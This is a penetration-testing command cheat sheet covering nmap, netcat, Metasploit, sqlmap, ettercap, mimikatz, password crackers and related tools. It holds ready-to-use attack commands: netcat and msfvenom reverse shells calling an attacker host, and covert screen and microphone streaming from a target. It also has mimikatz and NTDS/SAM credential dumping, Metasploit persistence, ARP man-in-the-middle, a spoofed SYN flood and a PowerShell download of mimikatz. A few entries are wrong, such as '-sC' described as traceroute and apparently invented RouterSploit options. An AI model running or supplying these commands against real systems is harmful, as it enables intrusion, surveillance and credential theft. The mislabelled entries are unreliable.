Tool Syntax
How to use the tools
Nmap command
Scanning methods
-sP
Ping scan
-sS
SYN scan
-sT
TCP connect scan
-sU
UDP scan
-sO
IP protocol scan
-sV
Service version detection
-sC
Scanning with traceroute
-T4
Timing template (0 to 5 sets the scan speed)
-oA
Output in all formats
-iL list.txt
Scan the hosts listed in the file
Capabilities
-oX file
Write XML output to the file
-oG file
Write grepable output to the file
-oA file
Save output in all three formats
-iL file
Read target hosts from the file
--excludefile file
Exclude the hosts listed in the file
Advanced features
-sV -p <port> --script=banner
Grab service banners
--traceroute
Trace the route to each host
--ttl value
Set the IP time-to-live
--script name
Run an NSE script
Firewall evasion
-f
Fragment packets
-S ip
Spoof the source address
-g #
Spoof the source port
-D ip,ip
Decoys
--mtu #
Set the MTU size
--spoof-mac mac
Spoof the MAC address
--data-length size
Append random data of the given size to each packet
--scan-delay time
Wait the given time between probes
--min-rate=X
Minimum number of packets sent per second
Convert XML output to HTML
xsltproc nmap.xml -o nmap.html
List live hosts
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f 5 > live_hosts.txt
Compare nmap results
ndiff scan1.xml scan2.xml
Reverse DNS lookup on an IP range
nmap -R -sL --dns-servers server 1.1.1.0/24
IDS test (Xmas scan with decoy IPs and spoofing)
# -D takes a comma-separated list of decoy IPs with no spaces
for x in {1..10000..1}; do nmap -T5 -sX -S spoof-source-IP -D decoyIP1,decoyIP2 --spoof-mac aa:bb:cc:dd:ee:ff -e eth0 -Pn targeted-IP; done
List of nmap scripts
List SMB shares: smb-enum-shares.nse
Wireshark software
eth.addr/eth.dst/eth.src
MAC address
rip.auth.passwd
RIP password
ip.addr/ip.dst/ip.src (ipv6.addr/ipv6.dst/ipv6.src for IPv6)
IP address
tcp.port/tcp.dstport/tcp.srcport
TCP ports
tcp.flags.ack/fin/push/reset/syn/urg
TCP flags
udp.port/udp.dstport/udp.srcport
UDP ports
http.authbasic
HTTP basic authentication
http.www_authenticate
HTTP WWW-Authenticate header
http.data
HTTP data
http.cookie
HTTP cookies
http.referer
HTTP Referer header
http.server
HTTP Server header
http.user_agent
HTTP User-Agent header
wlan.fc.type eq 0
802.11 management frame
wlan.fc.type eq 1
802.11 control frame
wlan.fc.type eq 2
802.11 data frame
wlan.fc.type_subtype eq 0 (1=response)
802.11 association request
wlan.fc.type_subtype eq 2 (3=response)
802.11 reassociation request
wlan.fc.type_subtype eq 4 (5=response)
802.11 probe request
wlan.fc.type_subtype eq 8
802.11 beacon
wlan.fc.type_subtype eq 10
802.11 disassociate
wlan.fc.type_subtype eq 11 (12=deauthenticate)
802.11 authentication
Comparison operators
eq OR ==
ne OR !=
gt OR >
lt OR <
ge OR >=
le OR <=
Logical operators
and OR &&
or OR ||
xor OR ^^
not OR !
Netcat command
Fundamentals
Connect to a listener on [TargetIP] at [port]:
$ nc [TargetIP] [port]
Start a listener:
$ nc -l -p [port]
Start an HTTP proxy server on the automation server:
./ncat -l 3128 --proxy-type http &
Scan ports
TCP port scan of the range [startPort] to [endPort]:
$ nc -v -n -z -w1 [TargetIP] [startPort]-[endPort]
Transfer files
Send a file (to a listener on port 1234):
nc.exe 10.10.10.10 1234 < file.log
Receive a file:
nc -vnlp 1234 > file.txt
Grab a [filename] from a listener:
1. Start the listener to push [filename]
$ nc -l -p [port] < [filename]
2. Connect to [TargetIP] and retrieve [filename]
$ nc -w3 [TargetIP] [port] > [filename]
Push a [filename] to a listener:
1. Start the listener to pull [filename]
$ nc -l -p [port] > [filename]
2. Connect to [TargetIP] and push [filename]
$ nc -w3 [TargetIP] [port] < [filename]
Backdoor shells
Linux shell:
$ nc -l -p [port] -e /bin/bash
Linux reverse shell:
$ nc [LocalIP] [port] -e /bin/bash
Windows shell:
$ nc -l -p [port] -e cmd.exe
Windows reverse shell:
$ nc [LocalIP] [port] -e cmd.exe
Use VLC for streaming
Use cvlc (command-line VLC) on the target to avoid GUI popups.
Record and stream the screen over UDP to the attacker's address on port 1234
# Start a listener on the attacker machine
vlc udp://@:1234
-- OR --
# Start a listener that stores the stream in a file
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
# Start streaming on the target machine. This may make the user's screen flash; lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=attackerip:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
Record and stream the screen over HTTP
# Start a listener on the attacker machine
vlc http://server.example.org:8080
-- OR --
# Start a listener that stores the stream in a file
vlc http://server.example.org:8080 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4}
# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
Record and stream to a multicast address
# Start a listener on the attacker machine for multicast
vlc udp://@multicastaddr:1234
# Broadcast the stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=multicastaddr:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
Record the screen to a file
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
Record and stream the microphone over UDP
vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"
SSH command
In the commands below, user@host stands for the SSH login on the target.
/etc/ssh/ssh_known_hosts # System-wide known hosts
~/.ssh/known_hosts # Hosts the user has logged into
sshd-generate # Generate SSH keys (DSA/RSA)
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key # Generate the SSH DSA host key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key # Generate the SSH RSA host key
If already in an SSH session, type the escape sequence ~C to open the ssh command line and configure a tunnel
Port forwarding must be allowed on the target:
/etc/ssh/sshd_config - AllowTcpForwarding yes
Connect with SSH on a specific port
ssh user@host -p 8222
Reverse port forwarding through the tunnel (in the support user's reverse shell)
ssh -R 4446:127.0.0.1:3128 user@host
http 127.0.0.1 4446
Forward X11 from the victim to the attacker
xhost +
vi ~/.ssh/config - ensure 'ForwardX11 yes'
ssh -X user@host
Create a reverse port forward from port 8080 on the remote host to port 443 on the attacker
ssh -R8080:127.0.0.1:443 user@host
Local port forward: listen on the attacker's port 8080 and send the traffic through the SSH tunnel to port 443 on 3.3.3.3
ssh -L8080:3.3.3.3:443 user@host
Dynamic tunnel using proxychains; also edit /etc/proxychains.conf to set the port (1080)
ssh -D1080 user@host
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3
Create a multi-hop SSH tunnel
ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS
Metasploit software
msfconsole -r file.rc
Load a resource file
msfcli | grep exploit/windows
List Windows exploits
msfencode -l
List encoders
msfpayload -h
List payloads
show exploits
Display exploits
show auxiliary
Display auxiliary modules
show payloads
Display payloads
search string
Search for a specific string
search exploit string
Search exploits
searchsploit -m exploits/php/webapps/45161.py
Copy the exploit file to the current directory
info module
Display module information
use module
Load an exploit or module
show options
Display module options
show advanced
Display advanced options
set option value
Set an option value
sessions -v
List sessions: -k # (kill), -u # (upgrade to Meterpreter)
sessions -s script
Run a Meterpreter script on all sessions
jobs -l
List all jobs (-k # to kill)
exploit -j
Run the exploit as a job
route add ip nmask sid
Pivoting
loadpath /home/modules
Load a third-party module tree
irb
Ruby shell
connect -s ip 443
Connect over SSL (nc clone)
route add ip mask session_id
Add a route through the pivot
exploit/multi/handler - set ExitOnSession false
Keep the handler running to catch more shells
set ConsoleLogging true (also SessionLogging)
Enable logging
Sqlmap command
Send a GET request
sqlmap.py -u "http://url?id=1&str=val"
Send a POST request
sqlmap.py -u "http://url" --data="id=1&str=val"
SQL injection on a specific parameter with a known database type
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --dbms="mssql|mysql|oracle|postgres"
SQL injection on a page that requires authentication
1. Log in and note the cookie values (cookie1=val1, cookie2=val2)
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"
SQL injection and retrieve the database version, name and user
./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db --current-user
SQL injection and list the tables of database testdb
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D "testdb"
SQL injection and list the columns of a table
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --columns -T "users"
Read the request from a file
sqlmap.py -r req.txt
Dump the records of the given table from the given database
sqlmap -r req -D openemr -T users_secure --dump
Use the time-based blind technique
sqlmap -r req --technique=T
Bypass a WAF with unicode escaping
sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns
msf
Create a Meterpreter payload (for Linux: -t file -o callback)
./msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port R | ./msfencode -t exe -o callback.exe -e x86/shikata_ga_nai -c 5
Create a bind Meterpreter payload
./msfpayload windows/meterpreter/bind_tcp RHOST=ip LPORT=port X > cb.exe
Create a Java reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war
Create a Windows reverse shell with msfvenom
msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows > reverse.exe
Generate an encoded payload with msfvenom
./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1 LPORT=443 > callback.exe
Start the msf database (bt5=mysql, kali=postgresql)
/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db_mysql
msf db_connect root:pass@localhost/metasploit
msf db_import nmap.xml
--- Kali ---
# service postgresql start
# service metasploit start
Get another shell by injecting into a process (by default it starts notepad and injects into it)
msf use post/windows/manage/multi_meterpreter_inject
msf set IPLIST attack ip
msf set LPORT callback port
msf set PIDLIST PID to inject into (default creates a new notepad)
msf set PAYLOAD windows/meterpreter/reverse_tcp
msf set SESSION meterpreter session ID
Enumerate HTTP banners on the internal network through the pivot
msf route add ip/range netmask meterpreter_ID
msf use post/multi/gather/ping_sweep # Set options and run
msf use auxiliary/scanner/portscan/tcp # Set options and run
msf hosts -u -S x.x.x -R # Searches for x.x.x.* and sets RHOSTS
msf use auxiliary/scanner/http/http_version # Set options and run
msf services -v -p 80 -S x.x.x -R # Displays IPs x.x.x.* with port 80 open
Meterpreter
Command
Explanation
help
List available commands
sysinfo
Display system information
ps
List processes
getpid
Display the current process ID
upload file C:\Program Files\
Upload a file
download file
Download a file
reg command
Interact with the registry
rev2self
Revert to the original user
shell
Drop to an interactive shell
migrate PID
Migrate to another process
background
Send the current session to the background
keyscan_start | keyscan_stop | keyscan_dump
Start/stop/dump the keylogger
execute -f cmd.exe -i
Run cmd.exe and interact with it
execute -f cmd.exe -i -H -t
Run cmd.exe as a hidden process with all tokens
hashdump
Dump all local hashes
run script
Run a script (/scripts/meterpreter)
portfwd [add|delete] -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389
Create a port forward in the current session: local port 443 to RDP (port 3389) on 3.3.3.3
Privilege escalation
use priv
getsystem
Token impersonation (dropping the token stops the impersonation)
use incognito
list_tokens -u
impersonate_token domain\\user
Using nmap through a Meterpreter SOCKS proxy
1. msf sessions # Note the Meterpreter ID
2. msf route add 3.3.3.0 255.255.255.0 id
3. msf use auxiliary/server/socks4a
4. msf run
5. Open a new shell and edit /etc/proxychains.conf
i. #proxy_dns (comment out)
ii. #socks4 127.0.0.1 9050 (comment out)
iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,135,445 3.3.3.3
Railgun - call the Windows API, e.g. to display a message box
meterpreter> irb
client.railgun.user32.MessageBoxA(0,"got","YOU","MB_OK")
Create a persistent Windows service
msf use post/windows/manage/persistence
msf set LHOST attack ip
msf set LPORT callback port
msf set PAYLOAD_TYPE TCP|HTTP|HTTPS
msf set REXENAME filename
msf set SESSION meterpreter session id
msf set STARTUP SERVICE
Collect recently opened files and web links
meterpreter run post/windows/gather/dumplinks
Create a new hidden process that writes the directory tree of c:\ to a file
execute -H -f cmd.exe -a '/c tree /F /A c:\ > C:\temp\tree.txt'
Ettercap software
Man-in-the-middle attack using filters
ettercap.exe -I iface -M arp -Tq -F file.ef MACs/IPs/Ports MACs/IPs/Ports
# e.g. // 80,443 // = any MAC, any IP, ports 80,443
Man-in-the-middle attack on the subnet with a compiled filter
ettercap -T -M arp -F filter // //
Switch flood attack
ettercap -TP rand_flood
Ettercap filters
Compile ettercap filters
etterfilter filter.filter -o out.ef
Example filter - drop VPN (IKE, UDP 500) traffic and strip the Accept-Encoding header so HTTP responses come back uncompressed
if (ip.proto == UDP && udp.dst == 500) {
    drop();
    kill();
}
if (ip.src == 'ip') {
    if (tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            msg("Replaced Encoding\n");
        }
    }
}
Mimikatz command
1. Upload mimikatz.exe and sekurlsa.dll to the target
2. Execute mimikatz
3. mimikatz# privilege::debug
4. mimikatz# inject::process lsass.exe sekurlsa.dll
5. mimikatz# @getLogonPasswords
6. sekurlsa::minidump /users/redteam/Desktop/lsass.DMP
7. sekurlsa::logonPasswords
Or
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
Or
# Cleartext passwords and hashes
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
Hping3 command
hping3 targetIP --flood --frag --spoof ip --destport # --syn
Arping command
./arping -I eth# -a # arps
Wine command
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o file.exe /tmp/code.c
wine file.exe
GRUB software
GRUB menu: add 'single' to the end of the kernel line. Reboot. Change the root password. Reboot.
Hydra command
hydra -l ftp -P words -v targetIP ftp
hashcat software
NTLMv2 crack
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
John the ripper software
Crack with a word list
$ ./john -wordfile:pw.lst -format:format hash.txt
Sample formats
$ john --format=des username:SDbsuge8iC58A
$ john --format=lm username:$LM$a9c604d244c4e99d
$ john --format=md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1
$ john --format=raw-sha1 A9993E364706816ABA3E25717850C26C9CD0D89D
# For --format=netlmv2 replace $NETLM with $NETLMv2
$ john --format=netlm
$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825:::::::
# Exactly 36 spaces between USER and HASH (SAPB and SAPG)
$ john --format=sapb
ROOT                                    $8366A4E9E6872C80
username:ROOT                                    $8366A4E9E6872C80
$ john --format=sapg
ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239
username:ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239
$ john --format=sha1-gen
$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
$ john --format=zip
$zip$*0*1*8005b1b7d077708d*dee4
username:$zip$*0*1*8005b1b7d077708d*dee4
Password lists
Create variations of a single base word
# Add a lowercase letter (@), uppercase letter (,), number (%) and symbol (^) to the end of the word
crunch 12 12 -t baseword@,%^ -o wordlist.txt
Use a custom special-character set: append two digits and then a special character
maskprocessor --custom-charset1=\!\@\#\$ baseword?d?d?1 -o wordlist.txt
Generate a wordlist from a website, including numbers
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
Vssown command
1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new shadow copy
a. cscript vssown.vbs /start (optional)
b. cscript vssown.vbs /create
3. Pull the following files from the shadow copy:
a. Copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit
b. Copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\System32\config\SYSTEM
c. Copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM
4. Copy the files to the attack box
5. Download tools: http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
6. Configure and build the libesedb source from the extracted package
a. cd libesedb
b. chmod +x configure
c. ./configure && make
7. Use esedbdumphash to extract the data table from ntds.dit
a. cd esedbtools
b. ./esedbdumphash ../../ntds.dit
File hashes
Hash length
MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes
Services with hash databases
http://isc.sans.edu/tools/hashsearch.html
# dig +short <md5>.md5.dshield.org TXT
Result = "filename | source", e.g. "cmd.exe | NIST"
Malware hash database
http://www.team-cymru.org/Services/MHR
# dig +short <MD5|SHA-1>.malware.hash.cymru.com TXT
Result = last seen timestamp, AV detection rate
Convert the timestamp: perl -e 'print scalar localtime(timestamp), "\n"'
Search in metadata files
https://fileadvisor.bit9.com/services/search.aspx
Search the virustotal database
https://www.virustotal.com/#search
Guess the password of the zip file
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip
Guess the password of the winrm service
crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>
Guess the password of the smb service
crackmapexec smb <IP> -u <USER> -p <PASS> --shares
Connect to MSSQL with impacket (user@host is a placeholder for the login)
mssqlclient.py -port 1433 user@host
PowerShell download files
powershell iwr -UseBasicParsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe
List pods
kubectl get pod
Check whether you have rights to exec into any pods
./kubectl auth can-i exec pods
Exec into sensitive-pod
./kubectl exec -it sensitive-pod /bin/bash
More information about the environment
kubectl get nodes -o wide
RouterSploit
Discover Devices
python rsf.py -m discovery
Scan for vulnerabilities
python rsf.py -m vulnerability
Brute Force
python rsf.py -m bruteforce
Exploit vulnerabilities
python rsf.py -m exploit
Generate Payloads
python rsf.py -m payloads
Sniffing
python rsf.py -m sniffer
DoS attacks
python rsf.py -m dos
Password Attacks
python rsf.py -m password
Shodan Integration
python rsf.py -m shodan